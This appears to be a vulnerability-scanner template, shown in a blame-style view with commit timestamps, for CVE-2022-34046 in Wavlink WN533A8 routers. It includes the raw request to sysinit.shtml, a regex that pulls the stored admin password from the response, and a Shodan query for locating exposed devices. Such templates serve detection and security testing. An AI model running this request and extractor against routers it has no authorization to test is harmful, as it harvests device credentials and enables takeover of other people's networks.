2022-07-20 19:52:19 +00:00
id : CVE-2022-34046
info :
2022-07-21 07:58:24 +00:00
name : Wavlink Sysinit.shtml - Password Exposure
2022-07-20 19:52:19 +00:00
author : For3stCo1d
severity : high
description : |
An access control issue in Wavlink WN533A8 M33A8.V5030.190716 allows attackers to obtain usernames and passwords via view-source:http://IP_ADDRESS/sysinit.shtml?r=52300 and searching for [logincheck(user);].
reference :
- https://drive.google.com/file/d/18ECQEqZ296LDzZ0wErgqnNfen1jCn0mG/view?usp=sharing
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34046
2022-08-02 09:31:02 +00:00
- http://packetstormsecurity.com/files/167890/Wavlink-WN533A8-Password-Disclosure.html
2022-07-26 13:45:11 +00:00
classification :
2022-07-28 11:33:27 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
2022-07-26 13:45:11 +00:00
cve-id : CVE-2022-34046
2022-07-28 11:33:27 +00:00
cwe-id : CWE-863
metadata :
shodan-query : http.title:"Wi-Fi APP Login"
verified : "true"
2022-07-21 07:58:24 +00:00
tags : cve,cve2022,wavlink,router,exposure
2022-07-20 19:52:19 +00:00
requests :
- raw :
- |
GET /sysinit.shtml?r=52300 HTTP/1.1
Host : {{Hostname}}
matchers-condition : and
matchers :
- type : word
part : body
words :
2022-07-21 07:58:24 +00:00
- 'var syspasswd="'
2022-07-20 19:55:16 +00:00
- '<title>APP</title>'
2022-07-20 19:52:19 +00:00
condition : and
- type : status
status :
- 200
extractors :
- type : regex
regex :
- 'syspasswd="(.+?)"'